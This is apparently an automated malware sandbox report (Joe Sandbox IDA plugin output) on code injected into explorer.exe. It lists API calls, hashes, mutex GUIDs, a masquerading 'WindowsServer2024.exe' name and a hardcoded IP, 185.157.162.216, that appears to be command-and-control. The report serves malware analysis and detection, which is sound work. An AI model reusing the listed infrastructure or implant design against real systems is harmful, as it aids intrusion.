                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Initialize$SecurityUninitializelstrlen
                                                                            • String ID: PT%dS$PT0S$d$default
                                                                            • API String ID: 1917595471-1758076759
                                                                            • Opcode ID: d6086f98d6119a2dfd25ad01eb9b79d04d1ef771eeed4e37cabfb9a82e3ec31b
                                                                            • Instruction ID: 7130df855654d3807daa5cc252e55cfc5cc7be1b0695c5b28c6f2b0f77ceb671
                                                                            • Opcode Fuzzy Hash: d6086f98d6119a2dfd25ad01eb9b79d04d1ef771eeed4e37cabfb9a82e3ec31b
                                                                            • Instruction Fuzzy Hash: 8C828336209FC8C6DA71DB15E8943AEB3A5F3C8B95F404166DA8D43B68DF39C649CB40
                                                                            APIs
                                                                            Strings
                                                                            • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 00BFDB10
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Crypt$Hash$Context$DataRelease$AcquireCreateDestroyObjectSingleWait
                                                                            • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                                                                            • API String ID: 1452691613-63410773
                                                                            • Opcode ID: a49916f8dd68e5eae8b0ebcf852319b595e90230a14c1e63738e3af535b9c1ed
                                                                            • Instruction ID: 911ff2d336722018b00936c624d700effa6c35f7a0101d60f9a0f30f6363ce59
                                                                            • Opcode Fuzzy Hash: a49916f8dd68e5eae8b0ebcf852319b595e90230a14c1e63738e3af535b9c1ed
                                                                            • Instruction Fuzzy Hash: EC510B36618A8482E750CF19F494B6EB7A2F7C5784F505525F78A83A68CFBDC889CF40
                                                                            APIs
                                                                            • LocalFree.KERNEL32 ref: 00C02386
                                                                            • CreateEventW.KERNEL32 ref: 00C023D6
                                                                            • CreateThread.KERNEL32 ref: 00C0240C
                                                                            • CloseHandle.KERNEL32 ref: 00C0242C
                                                                            • WSAStartup.WS2_32 ref: 00C0243B
                                                                            • CreateThread.KERNEL32 ref: 00C0246D
                                                                            • CreateThread.KERNEL32 ref: 00C02499
                                                                              • Part of subcall function 00BFDDC0: AllocateAndInitializeSid.ADVAPI32 ref: 00BFDE32
                                                                              • Part of subcall function 00BFDDC0: CheckTokenMembership.ADVAPI32 ref: 00BFDE4F
                                                                              • Part of subcall function 00BFDDC0: FreeSid.ADVAPI32 ref: 00BFDE66
                                                                            • WSACleanup.WS2_32 ref: 00C024B7
                                                                              • Part of subcall function 00BEF510: SHGetKnownFolderPath.SHELL32 ref: 00BEF587
                                                                              • Part of subcall function 00BEF510: lstrlenW.KERNEL32 ref: 00BEF59A
                                                                              • Part of subcall function 00BEF510: lstrlenW.KERNEL32 ref: 00BEF5B5
                                                                              • Part of subcall function 00BEF510: LocalAlloc.KERNEL32 ref: 00BEF5DC
                                                                              • Part of subcall function 00BEF510: lstrlenW.KERNEL32 ref: 00BEF620
                                                                              • Part of subcall function 00BEF510: CoTaskMemFree.COMBASE ref: 00BEF635
                                                                              • Part of subcall function 00C08378: _errno.LIBCMT ref: 00C083AF
                                                                              • Part of subcall function 00C08378: _invalid_parameter_noinfo.LIBCMT ref: 00C083BA
                                                                              • Part of subcall function 00BE7EF0: CoInitializeEx.COMBASE ref: 00BE7FFA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Create$FreeThreadlstrlen$InitializeLocal$AllocAllocateCheckCleanupCloseEventFolderHandleKnownMembershipPathStartupTaskToken_errno_invalid_parameter_noinfo
                                                                            • String ID: "%s%s"$WindowsServer2024$WindowsServer2024$WindowsServer2024.exe${741330C7-73F4-49B6-9258-6679317DED46}
                                                                            • API String ID: 2779143808-50802693
                                                                            • Opcode ID: 0d84770a6eab9a6bc71060a5844aac5839e86231e41b5808e95897b3f8f885de
                                                                            • Instruction ID: 4eff2b895e7a218db1828d1d08894d6bf0170fa793b0aaa75bb062cda88406f9
                                                                            • Opcode Fuzzy Hash: 0d84770a6eab9a6bc71060a5844aac5839e86231e41b5808e95897b3f8f885de
                                                                            • Instruction Fuzzy Hash: 5F513C31114B8586F774DF60F858BEA33A5F798348F408626D95947AA4DF7DC68CCB00

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 00BEF790: SHGetKnownFolderPath.SHELL32(?,?,?,?,?,?,?,?,00BF67C4), ref: 00BEF7AF
                                                                              • Part of subcall function 00BEF790: LocalAlloc.KERNEL32(?,?,?,?,?,?,?,?,00BF67C4), ref: 00BEF7C3
                                                                              • Part of subcall function 00BEF790: wnsprintfW.SHLWAPI ref: 00BEF7FC
                                                                              • Part of subcall function 00BEF790: lstrlenW.KERNEL32 ref: 00BEF80B
                                                                              • Part of subcall function 00BEF790: CoTaskMemFree.COMBASE ref: 00BEF81D
                                                                            • LocalAlloc.KERNEL32 ref: 00BF5ABE
                                                                            • LocalAlloc.KERNEL32 ref: 00BF5ADF
                                                                            • wnsprintfW.SHLWAPI ref: 00BF5B1F
                                                                            • wnsprintfW.SHLWAPI ref: 00BF5B3D
                                                                            • wnsprintfW.SHLWAPI ref: 00BF5B71
                                                                            • wnsprintfW.SHLWAPI ref: 00BF5B8F
                                                                            • LocalFree.KERNELBASE ref: 00BF6464
                                                                            • LocalFree.KERNEL32 ref: 00BF6490
                                                                            • LocalFree.KERNEL32 ref: 00BF649B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$wnsprintf$Free$Alloc$FolderKnownPathTasklstrlen
                                                                            • String ID: #$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL${01754A97-03F0-4626-BD2F-65C262CF4822}${02AAA0F1-549D-4514-A4C3-95769216EF86}${1A2C41FD-4110-4F27-A10A-F40FD520BF68}${22C965B7-04E5-4E21-B8C4-B23C6271EACC}${267AF3B6-7071-4851-B22B-4AD370C52995}${322D94F7-E188-44AD-BDAC-485C2607E49E}${351938E8-B1AE-4FF2-95B5-72821EC3026E}${4C60DA55-7BB8-4813-8661-DBAF26ED5DDE}${54744527-B32C-4D4D-A9E3-D7E04DACB3AF}${5D8760B5-DAFB-4059-9834-9879CAFA6E82}${63B3A1F3-F80F-45D9-8E3B-1C472D5D377A}${6C63B107-24D4-4657-9C6F-3E6336B91826}${6DE815D9-D711-4997-A495-CDF197C7B0D5}${6E676E15-E52D-4657-AD2B-2A593D6FDEFA}${7D78FC1D-661D-4F16-9CFD-BF2C482A86F5}${AAB40134-7579-406F-A83C-C9AB59AED6B3}${AB57ED28-7260-47FC-94FE-1ACD18BCF184}${B1FD7D9B-73A6-403D-8CE3-BD0AFB53E584}${B74D3F84-962E-48AE-A294-59C38EC7BF8D}${C070FC6A-5402-4558-99DF-C4D535E5D5B3}${C37212ED-321A-4629-8304-896FF9538ADC}${D44F28D3-E957-4DE1-A698-C851510460AD}${D68F034E-E0AB-4164-9244-39533778D3BB}${D7FE6321-139C-483C-8028-3587F9A0C15D}${D956794B-CFE9-4CA2-8079-D88118C4F650}${E1D8BC43-6A0D-443E-B57F-879297CD2924}${EF12D25B-2143-4AA1-B8F6-D3762EA7E9E0}${EFC4C27F-0DB6-49D7-A189-EE4E067A0483}${F1FBA124-1995-4C35-A87B-7D27BEA83B72}
                                                                            • API String ID: 1623426732-942114945
                                                                            • Opcode ID: 1394f4a21a88887c0b01a774efa77418e060bfd3e5fa76cf7218aff6abc0ee23
                                                                            • Instruction ID: c9289dfb094d6d3a91d53dc7978651e5e42ac52d847dcaccf0d43109c5642b80
                                                                            • Opcode Fuzzy Hash: 1394f4a21a88887c0b01a774efa77418e060bfd3e5fa76cf7218aff6abc0ee23
                                                                            • Instruction Fuzzy Hash: 2A52E935119A8AD6FB50EF55E850BA973B1F7C5744F500222EA8E03BA8CF3DD94ACB41
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: ADVAPI32.DLL$CRYPT32.DLL$DBGHELP.DLL$GDI32.DLL$GDIPLUS.DLL$KERNEL32.DLL$MSI.DLL$NTDLL.DLL$OLE32.DLL$SECUR32.DLL$SHELL32.DLL$SHLWAPI.DLL$USER32.DLL$WINHTTP.DLL$WINMM.DLL$WS2_32.DLL$WTSAPI32.DLL
                                                                            • API String ID: 2574300362-2969658442
                                                                            • Opcode ID: b00bce88697c7525284cc10c94eef30e1ae8b74fc276d152b0c34e2d56b66801
                                                                            • Instruction ID: 4d609c820a2e65a527567f32eb1dcbebc09a9ab9f43f9df2d63ea6210d1fa629
                                                                            • Opcode Fuzzy Hash: b00bce88697c7525284cc10c94eef30e1ae8b74fc276d152b0c34e2d56b66801
                                                                            • Instruction Fuzzy Hash: 5BB2E236219B89D5EB30CB14E4947BAB3A0F7D9B45F500526CB8E83B69DF39C589CB01

                                                                            Control-flow Graph

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Wait$ObjectSingle$closesocketshutdown$CloseFreeHandleLocalMultipleObjects
                                                                            • String ID: 185.157.162.216$8
                                                                            • API String ID: 3117981272-403147771
                                                                            • Opcode ID: 23e456067cab4518c9824daf8a1b515705ab3926eae3887a8c2cc2d171e48651
                                                                            • Instruction ID: cd2640a05a1fa3c9413a8e0d73509cfd3a284371dd6e1e9d490cead1d19276f7
                                                                            • Opcode Fuzzy Hash: 23e456067cab4518c9824daf8a1b515705ab3926eae3887a8c2cc2d171e48651
                                                                            • Instruction Fuzzy Hash: EA32B632218A84C6E7719F15E8987DAB361F7C8759F604215DAC987BA8CF7DC558CB00

                                                                            Control-flow Graph

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateErrorEventLastclosesocketshutdownsocket
                                                                            • String ID:
                                                                            • API String ID: 1739004367-0
                                                                            • Opcode ID: 312400b61dce4a0ed8e768a3da5f999724be7ff5feccfe21ec1dd019f5c2e3e1
                                                                            • Instruction ID: a0d87f251789d4aa9e0409219af9daf5ac6f5353ed47181bd9d78eb958420fc1
                                                                            • Opcode Fuzzy Hash: 312400b61dce4a0ed8e768a3da5f999724be7ff5feccfe21ec1dd019f5c2e3e1
                                                                            • Instruction Fuzzy Hash: 8AF1B976218AC0C6E7749B15E85479FB7B4F788B94F101616EB9A86BA8DF3CC584CF00

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • OpenMutexW.KERNEL32 ref: 00BFD5A5
                                                                            • LoadLibraryW.KERNEL32 ref: 00BFD5B9
                                                                            • LocalAlloc.KERNEL32 ref: 00BFD5D7
                                                                            • GetModuleFileNameW.KERNEL32 ref: 00BFD601
                                                                            • ExitProcess.KERNEL32 ref: 00BFD997
                                                                              • Part of subcall function 00C024E0: SetEvent.KERNEL32 ref: 00C024FF
                                                                              • Part of subcall function 00C024E0: WaitForSingleObject.KERNEL32 ref: 00C0251B
                                                                              • Part of subcall function 00C024E0: CloseHandle.KERNEL32 ref: 00C02532
                                                                              • Part of subcall function 00C024E0: SetEvent.KERNEL32 ref: 00C02549
                                                                              • Part of subcall function 00C024E0: WaitForSingleObject.KERNEL32 ref: 00C02565
                                                                              • Part of subcall function 00C024E0: CloseHandle.KERNEL32 ref: 00C0257C
                                                                              • Part of subcall function 00C024E0: CloseHandle.KERNEL32 ref: 00C02593
                                                                              • Part of subcall function 00C024E0: SetEvent.KERNEL32 ref: 00C025AA
                                                                              • Part of subcall function 00C024E0: WaitForSingleObject.KERNEL32 ref: 00C025C6
                                                                              • Part of subcall function 00C024E0: CloseHandle.KERNEL32 ref: 00C025DD
                                                                              • Part of subcall function 00C024E0: SetEvent.KERNEL32 ref: 00C025F4
                                                                              • Part of subcall function 00C024E0: WaitForSingleObject.KERNEL32 ref: 00C02610
                                                                              • Part of subcall function 00C024E0: CloseHandle.KERNEL32 ref: 00C02627
                                                                              • Part of subcall function 00C024E0: CloseHandle.KERNEL32 ref: 00C0263E
                                                                            • CloseHandle.KERNEL32 ref: 00BFD9B3
                                                                            • CloseHandle.KERNEL32 ref: 00BFD9C6
                                                                            • CloseHandle.KERNEL32 ref: 00BFD9F1
                                                                            • LocalFree.KERNEL32 ref: 00BFDA04
                                                                            • ExitProcess.KERNEL32 ref: 00BFDA15
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
• Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle$EventObjectSingleWait$ExitLocalProcess$AllocFileFreeLibraryLoadModuleMutexNameOpen
                                                                            • String ID: KERNEL32.DLL${04D458D6-7C6C-445F-AEAD-313D698F1F0A}${C3397568-8840-4085-8F6E-BC07C085BB3B}${C55632B1-A307-4128-9468-89792C176C2F}${CCEFB138-B038-41E1-AC53-171A4E58AB6A}${F95B00D0-572A-45B1-BD9B-5DB7078A4AC4}
                                                                            • API String ID: 2953619224-2614908309
                                                                            • Opcode ID: 93441eb68335b5b3d220e0fefe755afec2e770ad6dcdce4deff89af1890eb6f3
                                                                            • Instruction ID: 995c047491555bed908a3b2bfb688fd428997c956d74a0335b37787521f0db8b
                                                                            • Opcode Fuzzy Hash: 93441eb68335b5b3d220e0fefe755afec2e770ad6dcdce4deff89af1890eb6f3
                                                                            • Instruction Fuzzy Hash: 7CB14F31108A88C6F720EB65F89477A73E2F785754F504255E78A876A4DF7CC58CCB01

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 784 bf6790-bf67aa call bf59a0 787 bf67ac-bf67ae 784->787 788 bf67b3-bf67cf call bef790 784->788 789 bf6cee-bf6cf5 787->789 792 bf6cec 788->792 793 bf67d5-bf6800 call bf5a80 788->793 792->789 796 bf6806-bf6821 LocalAlloc 793->796 797 bf6ce1-bf6ce6 LocalFree 793->797 798 bf6cbb-bf6cc1 796->798 799 bf6827-bf6894 lstrcpyW StrStrIW CreateFileW 796->799 797->792 800 bf6cce-bf6cd4 798->800 801 bf6cc3-bf6cc8 LocalFree 798->801 802 bf689a-bf68b0 GetFileSize 799->802 803 bf6cb0-bf6cb5 LocalFree 799->803 800->797 804 bf6cd6-bf6cdb LocalFree 800->804 801->800 805 bf6c9d-bf6ca3 802->805 806 bf68b6-bf68d2 LocalAlloc 802->806 803->798 804->797 805->803 807 bf6ca5-bf6caa CloseHandle 805->807 806->805 808 bf68d8-bf6909 ReadFile 806->808 807->803 809 bf690f-bf6974 CloseHandle 808->809 810 bf6c92-bf6c97 LocalFree 808->810 811 bf6986-bf6994 809->811 810->805 812 bf6996-bf69de call bfcee0 811->812 813 bf69e0-bf69fb call c00d00 811->813 812->811 813->810 819 bf6a01-bf6a23 call bf7330 813->819 822 bf6c3d-bf6c46 819->822 823 bf6a29-bf6a4a LocalAlloc 819->823 822->810 825 bf6c48-bf6c66 call bf72b0 822->825 823->822 824 bf6a50-bf6a71 LocalAlloc 823->824 826 bf6c2f-bf6c37 LocalFree 824->826 827 bf6a77-bf6b41 call c08b30 lstrcpyW * 3 824->827 825->810 832 bf6c68-bf6c8c VirtualFree 825->832 826->822 835 bf6b47-bf6b52 827->835 836 bf6c21-bf6c29 LocalFree 827->836 832->810 837 bf6b64-bf6b6c 835->837 836->826 837->836 838 bf6b72-bf6b92 837->838 839 bf6c1c 838->839 840 bf6b98-bf6bc3 838->840 839->837 841 bf6bc5-bf6bdb 840->841 842 bf6be3-bf6c17 LocalFree * 4 840->842 841->842 842->789
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
• Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: File$AllocLocal$CloseCreateHandleReadSizelstrcpy
                                                                            • String ID: .DLL
                                                                            • API String ID: 2968648924-899428287
                                                                            • Opcode ID: c835d2fc4517c61167d87ad35f42fce30401e87f3c95d43c93a165d29785e5dc
                                                                            • Instruction ID: 7685dff310705201373fa3d18f7d44353d1a5138c58446b5e7d0b0b66e267e81
                                                                            • Opcode Fuzzy Hash: c835d2fc4517c61167d87ad35f42fce30401e87f3c95d43c93a165d29785e5dc
                                                                            • Instruction Fuzzy Hash: FBD1B436218B8486E764DB15F4947AAB7A1F7C5790F504225EBDE83BA8DF7CC489CB00

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
control_flow_graph 844 c05f4b 845 c05f6e-c05f7e call c06f30 844->845 848 c05f84-c05fb1 setsockopt 845->848 849 c06257-c0625e 845->849 850 c05fb7-c05fd5 CreateEventW 848->850 851 c06209-c0620f 848->851 852 c06260-c06267 849->852 853 c06283 849->853 850->851 856 c05fdb-c05ffc LocalAlloc 850->856 857 c06211-c06226 shutdown closesocket 851->857 858 c0622c-c06255 CloseHandle call c01f90 851->858 852->853 854 c06269-c06270 852->854 855 c06287-c06299 WaitForSingleObject 853->855 854->853 859 c06272-c06279 854->859 860 c05e89-c05e90 855->860 861 c06002-c06047 CreateThread 856->861 862 c061f5-c06200 CloseHandle 856->862 857->858 858->853 859->853 864 c0627b-c0627d ExitProcess 859->864 865 c05e96-c05eaa WaitForSingleObject 860->865 866 c0629e-c062b0 WaitForSingleObject 860->866 867 c061dc-c061e5 861->867 868 c0604d-c0605d GetTickCount 861->868 862->851 865->866 870 c05eb0-c05eb8 865->870 871 c062b2-c062c7 SetEvent WaitForSingleObject 866->871 872 c062cd-c062d3 866->872 867->862 873 c061e7-c061ef LocalFree 867->873 874 c06064-c0606b 868->874 875 c05ef0-c05f23 SleepEx WaitForSingleObject 870->875 876 c05eba-c05ece WaitForSingleObject 870->876 871->872 877 c062d5-c062e0 CloseHandle 872->877 878 c062e9-c062ef 872->878 873->862 879 c06071-c06079 874->879 880 c06173-c061d3 shutdown closesocket SetEvent WaitForSingleObject call c06dd0 call bf3ae0 CloseHandle 874->880 883 c05f25-c05f32 WaitForSingleObject 875->883 884 c05f36-c05f3d 875->884 876->875 882 c05ed0-c05ee7 WaitForSingleObject 876->882 877->878 887 c062f1-c062fc CloseHandle 878->887 888 c06305 878->888 885 c06096-c060aa WaitForSingleObject 879->885 886 c0607b-c0608f WaitForSingleObject 879->886 880->867 890 c05ee9 882->890 891 c05eee 882->891 883->884 892 c05f52-c05f5a 884->892 893 c05f3f-c05f47 884->893 895 c060b1-c060c5 WaitForSingleObject 885->895 896 c060ac 885->896 886->885 894 c06091 886->894 887->888 897 c0630a-c06328 CloseHandle 898 c06305 call c06dd0 888->898 890->866 891->860 903 c05f60-c05f68 892->903 904 c06285 892->904 901 c05f49 893->901 902 c05f4d 893->902 894->880 905 c060c7 895->905 906 c060cc-c060f6 call c03370 895->906 896->880 908 c06340-c06346 897->908 909 c0632a-c0633a ReleaseMutex CloseHandle 897->909 898->897 901->845 902->855 903->845 903->904 904->866 905->880 914 c060f8 906->914 915 c060fa-c06102 906->915 912 c06353-c06367 CloseHandle 908->912 913 c06348-c0634d CloseHandle 908->913 909->908 913->912 914->880 917 c06104-c0610f WSAGetLastError 915->917 918 c0612b-c06133 915->918 919 c06111-c06123 GetTickCount 917->919 920 c06129 917->920 921 c06163-c0616e SleepEx 918->921 922 c06135-c0613b GetTickCount 918->922 923 c06125 919->923 924 c06127 919->924 920->880 921->874 925 c06142-c0615f call c03370 922->925 923->880 924->918 925->921 928 c06161 925->928 928->925
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
• Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
